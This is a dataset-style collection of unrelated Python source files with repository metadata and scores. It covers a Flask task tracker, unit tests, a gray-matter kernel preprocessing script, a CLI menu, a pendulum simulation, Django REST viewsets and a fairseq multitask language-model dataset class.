start_time_in_seconds = time.time()
main()
stop_time_in_seconds = time.time()
total_runtime_in_seconds = stop_time_in_seconds - start_time_in_seconds
total_runtime_in_minutes = total_runtime_in_seconds/60
total_runtime_in_minutes_str = str(np.round(total_runtime_in_minutes, 3)) + ' minutes'
print(total_runtime_in_minutes_str)
| 2.65625
| 3
|
thread_queue_tests/test_queue_not_empty_exception.py
|
timmartin19/thread-queue
| 0
|
12782904
|
<reponame>timmartin19/thread-queue
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from thread_queue import QueueNotEmptyException, ThreadTaskException
class TestQueueNotEmptyException(unittest.TestCase):
def test_all_unprocessed_tasks(self):
exc_task = ThreadTaskException('blah', Exception(), task='task_blah')
exc = Exception('something')
exc_task_ignored = ThreadTaskException('blah2', Exception())
queue_exc = QueueNotEmptyException('blah', ['something'], [exc, exc_task, exc_task_ignored])
self.assertListEqual(['something', 'task_blah'], queue_exc.all_unprocessed_tasks)
def test_unattempted_tasks(self):
exc_task = ThreadTaskException('blah', Exception(), task='task_blah')
exc = Exception('something')
exc_task_ignored = ThreadTaskException('blah2', Exception())
queue_exc = QueueNotEmptyException('blah', ['something'], [exc, exc_task, exc_task_ignored])
self.assertListEqual(['something'], queue_exc.unattempted_tasks)
def test_thread_exceptions(self):
exc_task = ThreadTaskException('blah', Exception(), task='task_blah')
exc = Exception('something')
exc_task_ignored = ThreadTaskException('blah2', Exception())
queue_exc = QueueNotEmptyException('blah', ['something'], [exc, exc_task, exc_task_ignored])
self.assertListEqual([exc, exc_task, exc_task_ignored], queue_exc.thread_exceptions)
| 2.890625
| 3
|
app.py
|
Varigarble/twin-atom
| 0
|
12782905
|
<gh_stars>0
from pprint import pprint
from flask import Flask, render_template, request
import database
app = Flask(__name__)
@app.route('/')
def index():
return render_template('layout.html')
@app.route('/tasks_entry.html', methods=['GET', 'POST'])
def tasks_entry():
name = None
creators = None
description = None
start_date = None
completion_date = None
due_date = None
priority = None
assigned_to = None
project_file = None
status = None
if request.method == "POST":
name = request.form.get("name")
creators = request.form.get("creators")
description = request.form.get("description")
start_date = request.form.get("start_date")
completion_date = request.form.get("completion_date")
due_date = request.form.get("due_date")
priority = request.form.get("priority")
assigned_to = request.form.get("assigned_to")
project_file = request.form.get("project_file")
status = request.form.get("status")
return render_template('tasks_entry.html',
name = name,
creators = creators,
description = description,
start_date = start_date,
completion_date = completion_date,
due_date = due_date,
priority = priority,
assigned_to = assigned_to,
project_file = project_file,
status = status,
)
@app.route('/tasks_view.html', methods=['GET', 'POST'])
def tasks_view():
selected_creator = None
creators_tasks = None
if request.method == "POST":
selected_creator = request.form.get("creators")
creators_tasks = database.view_all_tasks_by_creators(selected_creator)
return render_template('tasks_view.html',
all_tasks = database.view_all_tasks(),
all_creators = database.get_all_creators(),
selected_creator = selected_creator,
creators_tasks = creators_tasks,
)
MENU = """Please select one of the following options:
1) View tasks
2) Create task
3) Update task
4) Delete task
5) Exit.
Your selection: """
def main_menu():
# use for testing
while (user_input := input(MENU)):
if user_input == "1":
pprint(database.view_all_tasks())
elif user_input == "2":
database.create_task()
elif user_input == "3":
database.update_task()
elif user_input == "4":
database.delete_task()
elif user_input == "5":
break
else:
print("Invalid input, please try again!")
if __name__ == "__main__":
app.run(debug=True)
# main_menu()
| 2.453125
| 2
|
src/svm/gm/preprocessing.py
|
aramis-lab/pac2019
| 3
|
12782906
|
"""File with the preprocessing tools."""
import os
import numpy as np
import nibabel as nib
import pandas as pd
from tqdm import tqdm
from sklearn.metrics import pairwise_distances
from sklearn.metrics.pairwise import linear_kernel
# Change this path
path = '' # folder containing the gray-matter maps
# Folders with the resulting data
output_data = 'Data/'
output_kernels = 'Kernels/'
output_target = 'Target/'
# List of all the NifTI files
nifti_images = [file for file in os.listdir(path) if file.endswith('.nii.gz')]
# Convert each NifTI into a numpy.ndarray
for file in nifti_images:
img = nib.load(os.path.join(path, file))
img_data = img.get_fdata()
np.save(os.path.join(output_data, file.split('_')[0]), img_data)
# Get the subject IDs
subjects = []
listdir = os.listdir(output_data)
listdir = [x for x in listdir if not x.startswith('.')]
n_samples = len(listdir)
# Compute the kernels using batches to reduce the memory usage
batches = np.array_split(np.arange(len(listdir)), 20)
lin_kernel = np.empty((n_samples, n_samples))
euclidean_norm = np.empty((n_samples, n_samples))
for batch_i in tqdm(batches):
data_i = []
for i in batch_i:
data_i.append(np.load(output_data + listdir[i]).ravel())
subjects.append(listdir[i].split('.')[0])
data_i = np.asarray(data_i)
for batch_j in batches:
data_j = []
for j in batch_j:
data_j.append(np.load(output_data + listdir[j]).ravel())
data_j = np.asarray(data_j)
# Compute the kernels
euclidean_norm[batch_i[0]:batch_i[-1] + 1,
batch_j[0]:batch_j[-1] + 1] = (
pairwise_distances(data_i, data_j, metric='euclidean') ** 2
)
lin_kernel[batch_i[0]:batch_i[-1] + 1, batch_j[0]:batch_j[-1] + 1] = (
linear_kernel(data_i, data_j)
)
# Save the kernels in CSV files
linear_kernel_df = pd.DataFrame(lin_kernel, index=subjects, columns=subjects)
linear_kernel_df.to_csv(output_kernels + 'linear_kernel.csv')
euclidean_norm_df = pd.DataFrame(euclidean_norm, index=subjects,
columns=subjects)
euclidean_norm_df.to_csv(output_kernels + 'euclidean_norm.csv')
# Save the target variable in a CSV file
# Change this path
df_y = pd.read_csv("/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/"
"PAC2019_BrainAge_Training.csv")
y = []
for subject in subjects:
y.append(df_y[df_y['subject_ID'] == subject]['age'].item())
df_y_new = pd.Series(y, index=subjects)
df_y_new.to_csv(output_target + 'age.csv')
| 2.28125
| 2
|
climate/core/menu.py
|
FidelElie/cliMate
| 0
|
12782907
|
"""
"""
import sys
import itertools
from climate.lib import mapper
from climate.lib import utilities
from climate.lib import inquirers
from climate.lib.inquirers import INQUIRER_TABLE
from climate.lib.converters import CONVERSION_TABLE
from climate.lib.converters import map_int, map_float, map_bool, map_list
from . import Parsing
from . import Help
class Menu(object):
"""Class For Handling Application Menu Navigation
Will be disabled if the setting 'use_menu' is set to false
Parameters
----------
cli_data: dict
Cli data passed through from main CliMate class.
"""
current_local = []
locations = []
help_mapper = {
"Show Commands": "display_help",
"Show Documentation": "show_docs"
}
standard_option_mapper = {
"Help": "open_help_menu",
"Exit": "exit_application"
}
def __init__(self, cli_data, settings):
self.cli_data = cli_data
self.settings = settings
def open_main_menu(self):
if "menu" not in self.cli_data["general"]:
self.standard_navigation()
else:
self.locations = self.cli_data["general"]["menu"]
self.menued_navigation()
def standard_navigation(self):
commands = self.cli_data["commands"]
command_keys = [key for key in commands]
command_names = [commands[key]["name"] for key in commands]
menu_names = command_names.copy()
menu_names += self.add_menu_options()
app_name = self.settings["app_name"]
menu_message = app_name if app_name is not None else "Main Menu"
command_menu_name = inquirers.inquirer_list(
menu_names, menu_message)
if command_menu_name in command_names:
command_name_index = command_names.index(command_menu_name)
command_key = command_keys[command_name_index]
command_args = commands[command_key]["arguments"]
parsed_command_args = \
Parsing.resolve_command_arguments(
command_args, self.cli_data)
command_target = commands[command_key]["target"]
command_arguments = self.menu_arguments(parsed_command_args)
Parsing.call_target(
command_key, command_target, command_arguments, self.settings)
else:
# standard application option was chosen (i.e one not in cli file)
method_string = self.standard_option_mapper[command_menu_name]
getattr(self, method_string)()
def menued_navigation(self):
while True:
command_found = False
if not self.current_local:
local = self.locations
else:
local = self.resolve_local(self.current_local)
if isinstance(local, dict):
local_func, local_args = inquirers.get_inquirer("list")
local_args["choices"] = local
if self.current_local:
local["Back"] = "navigate_back"
local_args["message"] = self.current_local[-1]
else:
# add buttons to main menu
for key in self.standard_option_mapper:
if self.settings[f"menu_{key.lower()}"]:
local[key] = self.standard_option_mapper[key]
app_name = self.settings["app_name"]
local_args["message"] = \
app_name if app_name is not None else "Main Menu"
nav_point = local_func(**local_args)
self.current_local += [nav_point]
elif isinstance(local, str):
try:
self.navigate_back()
if local not in [*self.cli_data["commands"]]:
command_found = False
getattr(self, local)()
else:
command_found = True
chosen_comamnd = self.cli_data["commands"][local]
command_target = chosen_comamnd["target"]
args = chosen_comamnd["arguments"]
resolved_arguments = \
Parsing.resolve_command_arguments(args, self.cli_data)
arguments = self.menu_arguments(resolved_arguments)
Parsing.call_target(command_target, arguments)
except KeyError:
TypeError("Error in chosen command.")
else:
raise TypeError("Invalid Datatype Found For Menu Navigation.")
if command_found:
if self.settings["exit_upon_command"]:
sys.exit()
def open_help_menu(self):
help_func, help_args = inquirers.get_inquirer("choices")
help_args["choices"] = [key for key in self.help_mapper]
message = self.settings["help_menu_message"]
help_args["message"] = message if message is not None else "Help"
help_choice = help_func(**help_args)
help_handler = Help(self.cli_data, self.settings)
help_method_string = self.help_mapper[help_choice]
getattr(help_handler, help_method_string)()
def exit_application(self):
print("Exiting Application")
sys.exit(0)
def add_menu_options(self):
navigations = []
for key in self.settings:
if "menu" == key.split("_")[0]:
navigations.append(
[self.settings[key], key.split("_")[1].capitalize()])
return [nav[1] for nav in navigations if nav[0]]
def resolve_local(self, keys):
local = self.locations
for key in keys:
local = local[key]
return local
def navigate_back(self):
del self.current_local[-1]
@staticmethod
def menu_arguments(command_args):
"""Uses Pyinquirer to get desired arguments through MenuHandler.
Parameters
----------
command_args: dict
Dictionary containing the command arguments.
Returns
-------
arguments: dict
Dictionary containing desired and chosen arguments.
"""
try:
arguments = {}
for arg in command_args:
inquirer_function, inquirer_args = \
inquirers.get_inquirer(command_args[arg]["type"])
inquirer_args["message"] = command_args[arg]["name"]
if "default" in command_args[arg]:
inquirer_args["message"] = "{} ({})".format(inquirer_args["message"], command_args[arg]["default"])
if command_args[arg]["type"] == "choices":
if "map" in command_args[arg]:
inquirer_args["choices"] = \
mapper.map_string(
command_args[arg]["map"], arguments)
else:
inquirer_args["choices"] = \
[c for c in command_args[arg]["choices"].values()]
if "fallback" in command_args[arg]:
fallback_option = command_args[arg]["fallback"]
inquirer_args["choices"] += [fallback_option]
def fallback(x):
if x == command_args[arg]["fallback"]:
if "default" not in command_args[arg]:
return None
else:
return command_args[arg]["default"]
else:
choices = command_args[arg]["choices"]
return list(choices.keys())[
list(choices.values()).index(x)]
inquirer_args["lambda_filter"] = fallback
else:
if "default" in command_args[arg]:
if "lambda_filter" in inquirer_args:
def full_conversion(x):
x = command_args[arg]["default"] if x.strip() is "" else x
if command_args[arg]["type"] == "float":
return float(x)
elif command_args[arg]["type"] == "int":
return int(x)
else:
return x
inquirer_args["lambda_filter"] = full_conversion
else:
inquirer_args["lambda_filter"] = lambda x: command_args[arg]["default"] if x.strip() is "" else x
arguments[arg] = inquirer_function(**inquirer_args)
except KeyError:
raise KeyError(f"Invalid Command argument '{arg}'")
return arguments
| 2.4375
| 2
|
src/obj/pendulum.py
|
jesuscfv/friction_less
| 0
|
12782908
|
<gh_stars>0
import numpy as np
import math
from . import physicalobject, definitions as defs, resources, rungekutta
class Pendulum(physicalobject.PhysicalObject):
def __init__(self, phi=0.7854, length=1.0, x_h=1.0, y_h=1.0, *args, **kwargs):
image = resources.get_resource(defs.PENDULUM_IMAGE)
super(Pendulum, self).__init__(img=image, *args, **kwargs)
# Pendulum parameters
self.length = length
self.gl = float(defs.g)/1.0
if length > 0.0:
self.gl = float(defs.g)/float(length)
# Initial 2-D homogeneous matrix
self.a_H_p = np.array([[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]])
# Initial 2-D homogeneous matrix for the rotation axis
self.tb_H_a = np.array([[1.0, 0.0, float(x_h)],
[0.0, 1.0, float(y_h)],
[0.0, 0.0, 1.0]])
# Initial screen coordinates
self.s = np.array([[0.0], [0.0]])
#self.x, self.y = int(self.s[0]), int(self.s[1])
# Pendulum state
self.Y = np.array([[float(phi)], [0.0]])
self.update_a_H_p(phi)
# Initial conditions for the Runge-Kutta solver
self.rg = rungekutta.RungeKutta(y_0=self.Y)
def update(self, dt):
# Physics stuff (update position)
super(Pendulum, self).update(dt)
# Update pendulum state
self.Y = self.rg.step(self.dynamics, dt)
self.update_a_H_p(self.Y[0][0])
'''self.s = defs.S.dot(self.tb_H_a.dot(self.a_H_p[:3, 2:]))
self.x, self.y = int(self.s[0]), int(self.s[1])
self.rotation = math.degrees(self.Y[0][0]) + 90'''
def dynamics(self, Y):
# The dynamics uses local coordinates
return [[Y[1][0]], [-self.gl*np.sin(Y[0][0])]]
def update_a_H_p(self, phi):
c_phi = np.cos(phi)
s_phi = np.sin(phi)
self.a_H_p = np.array([[c_phi, -s_phi, -self.length * s_phi],
[s_phi, c_phi, -self.length*c_phi],
[0.0, 0.0, 1.0]])
self.s = defs.S.dot(defs.w_H_tb.dot(self.tb_H_a.dot(self.a_H_p[:3, 2:])))
# Update sprite position and orientation
self.x, self.y = self.s[0], self.s[1]
self.rotation = math.degrees(self.Y[0][0]) + 90
| 2.671875
| 3
|
backend/posts/views.py
|
shakib609/django-redis-blog
| 0
|
12782909
|
from django.conf import settings
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from django.core.cache.backends.base import DEFAULT_TIMEOUT
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAdminUser
from rest_framework_extensions.mixins import NestedViewSetMixin
from common.permissions import IsAuthorOrReadOnly
from .models import Comment, Post, Tag
from .serializers import CommentSerializer, PostSerializer, TagSerializer
CACHE_TIMEOUT = getattr(settings, 'CACHE_TIMEOUT', DEFAULT_TIMEOUT)
class PostViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
queryset = Post.objects.all()
serializer_class = PostSerializer
lookup_field = 'slug'
permission_classes = [IsAuthenticatedOrReadOnly, IsAuthorOrReadOnly]
@method_decorator(cache_page(CACHE_TIMEOUT))
def list(self, request, *args, **kwargs):
return super().list(request, *args, **kwargs)
class CommentViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
queryset = Comment.objects.all()
serializer_class = CommentSerializer
permission_classes = [IsAuthenticatedOrReadOnly, IsAuthorOrReadOnly]
class TagViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
queryset = Tag.objects.all()
serializer_class = TagSerializer
lookup_field = 'slug'
permission_classes = [IsAuthenticatedOrReadOnly]
@method_decorator(cache_page(CACHE_TIMEOUT))
def list(self, request, *args, **kwargs):
return super().list(request, *args, **kwargs)
| 2.015625
| 2
|
m_kplug/model/kplug_dataset.py
|
WaveLi123/m-kplug
| 2
|
12782910
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import torch
import random
import math
import logging
import itertools
from fairseq import utils
from fairseq.data import FairseqDataset, LanguagePairDataset
from .noise_util import apply_span_mask, apply_random_mask, apply_entity_mask_for_mlm
from fairseq.data import data_utils
logger = logging.getLogger(__name__)
def collate(
samples,
pad_idx,
eos_idx,
left_pad_source=False,
left_pad_target=False,
input_feeding=True,
pad_to_length=None,
):
if len(samples) == 0:
return {}
def merge(key, left_pad, move_eos_to_beginning=False, pad_to_length=None):
return data_utils.collate_tokens(
[s[key] for s in samples],
pad_idx, eos_idx, left_pad, move_eos_to_beginning,
pad_to_length=pad_to_length,
)
# sort by descending source length
src_lengths = torch.LongTensor([s['source'].ne(pad_idx).long().sum() for s in samples])
src_lengths, sort_order = src_lengths.sort(descending=True)
id = torch.LongTensor([s['id'] for s in samples]).index_select(0, sort_order)
src_tokens = merge('source', left_pad=left_pad_source).index_select(0, sort_order)
# sentence classification
cls_target = merge('cls_target', left_pad=left_pad_target).index_select(0, sort_order).view(-1)
# masked language model
mlm_target = merge('mlm_target', left_pad=left_pad_target).index_select(0, sort_order)
# causal language model
prev_output_tokens = merge('prev_output_tokens', left_pad=left_pad_target).index_select(0, sort_order)
prev_output_positions = merge('prev_output_positions', left_pad=left_pad_target).index_select(0, sort_order)
clm_target = merge('clm_target', left_pad=left_pad_target).index_select(0, sort_order)
# sequence tagging
tag_target = merge('tag_target', left_pad=left_pad_target).index_select(0, sort_order)
ntokens = src_lengths.sum().item()
batch = {
'id': id,
'nsentences': len(samples),
'ntokens': ntokens,
'net_input': {
'src_tokens': src_tokens,
'src_lengths': src_lengths,
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
},
'cls_target': cls_target,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': tag_target,
}
return batch
class KnowledgeLanguagePairDataset(LanguagePairDataset):
@classmethod
def apply_mask(cls, dataset: torch.utils.data.Dataset, *args, **kwargs):
"""Return the source and target datasets for masked LM training."""
return cls(dataset, *args, **kwargs)
def __init__(
self, src, src_sizes, src_dict,
tgt=None, tgt_sizes=None, tgt_dict=None,
meta=None, meta_sizes=None, meta_dict=None,
left_pad_source=True, left_pad_target=False,
max_source_positions=1024, max_target_positions=1024,
shuffle=True,
mask_idx=None,
mask_prob=0.15, leave_unmasked_prob=0.1, random_token_prob=0.1,
mask_whole_words=None,
block_size=64,
sub_task=None,
):
super().__init__(src, src_sizes, src_dict,
tgt=tgt, tgt_sizes=tgt_sizes, tgt_dict=tgt_dict,
left_pad_source=left_pad_source, left_pad_target=left_pad_target,
shuffle=shuffle)
self.meta = meta
self.meta_sizes = meta_sizes
self.meta_dict = meta_dict
self.mask_idx = mask_idx
self.mask_prob = mask_prob
assert len(meta_sizes) == len(src_sizes)
self.sub_task = sub_task
self.cls_pad = self.src_dict.pad() # 0 in bert_dict, 1 in fairseq_dict
self.block_size = block_size
self.max_source_positions = max_source_positions
self.max_target_positions = max_target_positions
self.pred_probs = torch.FloatTensor(
[1 - leave_unmasked_prob - random_token_prob, leave_unmasked_prob, random_token_prob])
self.debug_size_for_mlm = 0
self.debug_size_for_clm = 0
self.debug_size_for_tag = 0
self.debug_size_for_cls = 0
self.debug_size_for_titlegen = 0
def _parse_ocr_data(self, src_item):
"""
Args:
src_item:
- title [SEP] content [SEP] title [SEP] content.
- used for title generation
- file: discovery_all.ocr
"""
def _get_title_and_content(sep_idx):
title_pos = []
content_pos = []
for i, pos in enumerate(sep_idx):
last_pos = sep_idx[i - 1] if i > 0 else 1
pos_range = np.arange(last_pos + 1,
pos) if pos > last_pos + 1 else None
if i % 2 == 0:
title_pos.append(pos_range)
else:
content_pos.append(pos_range)
if len(content_pos) < len(title_pos):
content_pos.append(None)
return title_pos, content_pos
src_item_np = np.array(src_item)
sep_idx = np.where(src_item_np == self.src_dict.eos())[0]
title_positions, content_positions = _get_title_and_content(sep_idx)
source = src_item[:1]
clm_target = np.array([], dtype=src_item_np.dtype)
prev_output_positions_list = []
sep_positions_list = []
for title_position, content_position in zip(title_positions, content_positions):
if title_position is not None:
old_len = len(source)
source = np.append(source, src_item[title_position])
clm_target = np.append(clm_target, src_item[title_position])
prev_output_positions_list = prev_output_positions_list + list(range(old_len, len(source)))
if content_position is not None:
source = np.append(source, src_item[content_position])
sep_positions_list.append(len(source) - 1)
sep_positions_list = [v for v in sep_positions_list if v != 0 and v != len(source) - 1]
source = torch.LongTensor(np.append(source, self.src_dict.eos()))
clm_target = torch.LongTensor(clm_target)
return source, clm_target, prev_output_positions_list, sep_positions_list
def _get_example_for_boundary_detection(self, index, src_item):
""" TokenClassification
Task: sequence tagging
"""
source, _, _, sep_positions_list = self._parse_ocr_data(src_item)
tag_target = torch.from_numpy(np.full(len(source), 1)) # 0: pad 1: negative 2: positive
tag_target[0] = self.cls_pad
tag_target[-1] = self.cls_pad
tag_target[sep_positions_list] = 2
if self.debug_size_for_tag < 2:
self.debug_size_for_tag += 1
logger.info('========= index: {} == boundary detection ======='.format(str(index)))
logger.info('src_raw: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in source]))
logger.info('tag_target: ' + ''.join([str(ii.item()) for ii in tag_target]))
example = {
'id': index,
'source': source,
'cls_target': torch.LongTensor([self.cls_pad]),
'mlm_target': torch.from_numpy(np.full(len(source), self.src_dict.pad())),
'clm_target': torch.from_numpy(np.full(1, self.src_dict.pad())),
'tag_target': tag_target,
'prev_output_tokens': torch.from_numpy(np.full(1, 1)),
'prev_output_positions': torch.LongTensor([1]),
}
return example
def _create_dummy_data(self, task, **kwargs):
if task == 'cls':
src_label = torch.LongTensor([-1])
return src_label
if task == 'mlm':
mlm_target = torch.from_numpy(np.full(kwargs['src_sz'], self.src_dict.pad()))
return mlm_target
if task == 'clm':
prev_output_positions = torch.LongTensor([1])
prev_output_tokens = torch.from_numpy(np.full(1, 1))
clm_target = torch.from_numpy(np.full(1, self.src_dict.pad()))
return prev_output_positions, prev_output_tokens, clm_target
def _get_example_for_title_generation(self, index, src_item):
""" title generation
Task: CLM + MLM
"""
source, clm_target, prev_output_positions_list, _ = self._parse_ocr_data(src_item)
# build data for MLM (random mask)
mlm_positions = apply_random_mask(len(source), ignore_index=set(prev_output_positions_list))
masked_pos = sorted(list(set(prev_output_positions_list + mlm_positions)))
mlm_target = torch.from_numpy(np.full(len(source), self.src_dict.pad()))
mlm_target[mlm_positions] = source[mlm_positions]
# build data for CLM (mask all title)
prev_output_positions = np.array(prev_output_positions_list)
prev_output_tokens = source[prev_output_positions - 1].clone()
prev_output_positions = torch.LongTensor(prev_output_positions)
if self.debug_size_for_titlegen < 2:
logger.info('========= index: {} == title generation ======='.format(str(index)))
logger.info('src_raw: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in source]))
source[masked_pos] = self.replace(source[masked_pos])
if self.debug_size_for_titlegen < 2:
self.debug_size_for_titlegen += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in source]))
logger.info('clm_pos: ' + ' '.join([str(v) for v in prev_output_positions_list]))
logger.info('clm_input: ' + ''.join([self.src_dict[ii] for ii in prev_output_tokens]))
logger.info('clm_target: ' + ''.join([self.src_dict[ii] for ii in clm_target]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': source,
'cls_target': self._create_dummy_data('cls'),
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(source), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_cls(self, index, src_item, src_meta):
assert 'cls' in self.sub_task
src_meta = np.array([int(self.meta_dict[k]) if k != self.meta_dict.unk() else 10000 for k in src_meta])
src_sz = len(src_item)
assert len(src_meta) % 2 == 1
src_label, src_entity = torch.LongTensor(src_meta[:1]), src_meta[1:]
# build data for MLM & CLM
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
if self.debug_size_for_cls < 2:
logger.info('========= index: {} ==== MLM and CLM mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
if self.debug_size_for_cls < 2:
self.debug_size_for_cls += 1
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_mlm(self, index, src_item, src_meta):
assert 'mlm' in self.sub_task
src_sz = len(src_item)
src_label = src_meta[0]
src_entity = src_meta[1:]
src_label = torch.LongTensor([int(self.meta_dict[src_label])]) \
if src_label >= self.meta_dict.nspecial else self._create_dummy_data('cls')
src_entity = np.array([int(self.meta_dict[k]) for k in src_entity])
assert len(src_entity) % 2 == 0
src_entity = np.array(src_entity.reshape(-1, 2)) + 1 # offset for [CLS]
# build data for MLM in Encoder
mlm_positions_1 = apply_entity_mask_for_mlm(src_sz, src_entity) # BERT & entity
mlm_positions_2 = apply_random_mask(src_sz, ignore_index=set(mlm_positions_1)) # BERT
mlm_position_list = sorted(list(set(mlm_positions_1 + mlm_positions_2)))
assert len(mlm_positions_1) + len(mlm_positions_2) == len(mlm_position_list)
masked_pos_list = sorted(list(set(mlm_position_list)))
assert masked_pos_list[0] > 0 # no mask in bos
masked_pos = np.array(masked_pos_list)
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
mlm_target[mlm_position_list] = src_item[mlm_position_list]
# build data for CLM in Decoder
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
if self.debug_size_for_mlm < 2:
logger.info('========= index: {} ==== MLM mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src_entity: ' + ' '.join(
[''.join([self.src_dict[src_item[ii]] if ii < src_sz else '' for ii in range(ent[0], ent[1])]) for ent
in src_entity]))
src_item[masked_pos] = self.replace(src_item[masked_pos])
if self.debug_size_for_mlm < 2:
self.debug_size_for_mlm += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('mlm_pos: ' + ' '.join([str(v) for v in mlm_position_list]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_clm(self, index, src_item, src_meta):
assert 'clm' in self.sub_task
src_meta = np.array([int(self.meta_dict[k])
if k < self.meta_dict.nspecial else None for k in src_meta])
src_sz = len(src_item)
assert len(src_meta) % 2 == 1
src_label, src_entity = torch.LongTensor(src_meta[:1]), src_meta[1:]
src_entity = np.array(src_entity.reshape(-1, 2)) + 1
src_label = torch.LongTensor(np.array([None]))
# build data for CLM in Decoder
clm_position_list = np.array(apply_span_mask(src_sz-1) + 1) # start at 1
prev_output_positions = clm_position_list
prev_output_tokens = src_item[prev_output_positions - 1].clone()
clm_target = src_item[prev_output_positions].clone()
prev_output_positions = torch.LongTensor(prev_output_positions)
# build data for MLM in Encoder
mlm_position_list = []
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
masked_pos = prev_output_positions
if self.debug_size_for_clm < 2:
logger.info('========= index: {} ==== CLM Mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src_entity: ' + ' '.join(
[''.join([self.src_dict[src_item[ii]] if ii < src_sz else '' for ii in range(ent[0], ent[1])]) for ent
in src_entity]))
src_item[masked_pos] = self.replace(src_item[masked_pos])
if self.debug_size_for_clm < 2:
self.debug_size_for_clm += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('clm_pos: ' + ' '.join([str(v) for v in clm_position_list]))
logger.info('clm_input: ' + ''.join([self.src_dict[ii] for ii in prev_output_tokens]))
logger.info('clm_target: ' + ''.join([self.src_dict[ii] for ii in clm_target]))
logger.info('mlm_pos: ' + ' '.join([str(v) for v in mlm_position_list]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_multitask(self, index, src_item, src_meta):
""" multi-task joint training
tasks:
- mlm: masked language model (encoder-only)
- clm: causal language model (encoder-decoder or decoder-only)
- sentcls: sentence classification (encoder-only)
- tokencls: token classification, sequence tagging (encoder-only)
- spancls: token span classification, such as relation classification, entity classification (encoder-only)
"""
assert 'clm' in self.sub_task or 'mlm' in self.sub_task
src_meta = np.array([int(self.meta_dict[k]) if k != self.meta_dict.unk() else 10000 for k in src_meta])
src_sz = len(src_item)
assert len(src_meta) % 2 == 1
src_label, src_entity = torch.LongTensor(src_meta[:1]), src_meta[1:]
src_entity = np.array(src_entity.reshape(-1, 2)) + 1 # offset for [CLS]
if 'sentcls' not in self.sub_task:
src_label = torch.LongTensor([self.cls_pad])
mlm_position_list, clm_position_list = [], []
if 'clm' in self.sub_task:
clm_position_list = apply_span_mask(src_sz)
prev_output_positions = np.array(clm_position_list)
if 'mlm' in self.sub_task:
mlm_positions_1 = apply_entity_mask_for_mlm(src_sz, src_entity,
ignore_index=set(clm_position_list)) # BERT & entity
mlm_positions_2 = apply_random_mask(src_sz, ignore_index=set(clm_position_list + mlm_positions_1)) # BERT
mlm_position_list = sorted(list(set(mlm_positions_1 + mlm_positions_2)))
assert len(mlm_positions_1) + len(mlm_positions_2) == len(mlm_position_list)
masked_pos_list = sorted(list(set(clm_position_list + mlm_position_list)))
assert len(clm_position_list) + len(mlm_position_list) == len(masked_pos_list)
assert masked_pos_list[0] > 0
masked_pos = np.array(masked_pos_list)
# build data for CLM in Decoder
prev_output_tokens = src_item[prev_output_positions - 1].clone()
clm_target = src_item[prev_output_positions].clone()
prev_output_positions = torch.LongTensor(prev_output_positions)
# build data for MLM in Encoder
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
mlm_target[mlm_position_list] = src_item[mlm_position_list]
if self.debug_size_for_mlm < 2:
logger.info('========= index: {} ==== MLM and CLM mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
